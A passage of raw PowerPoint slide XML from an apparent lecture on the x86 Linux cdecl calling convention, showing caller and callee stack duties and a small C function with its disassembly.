      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="60713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Calling Convention</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All of the previous information must be stored on the stack in order to call the function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Who should store that information?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Caller?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Thus, we need to define a convention of who pushes/stores what values on the stack to call a function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Varies based on processor, operating system, compiler, or type of call</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>96</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="148394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x86 Linux Calling Convention (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cdecl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Caller (in this order)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pushes arguments onto the stack (in right to left order)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pushes address of instruction after call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Callee</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pushes previous frame pointer onto stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Creates space on stack for local variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensures that stack is consistent on return</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Return value in %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> register</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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97</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194995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954" y="305134"/>
            <a:ext cx="4229810" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">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int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>{   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> a + b + 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> main()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>{   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>;   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  a = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(10, 40);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> a;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>98</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5068261" y="190041"/>
            <a:ext cx="5832763" cy="666795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2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  push </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endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,</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endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0xc(</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a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>),</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eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0x8(</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a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>),</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edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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lea (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,1),</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eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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add $0x1,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  pop </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endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  push </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endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,</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endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sub $0x18,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x28,0x4(</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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0xa,(</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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
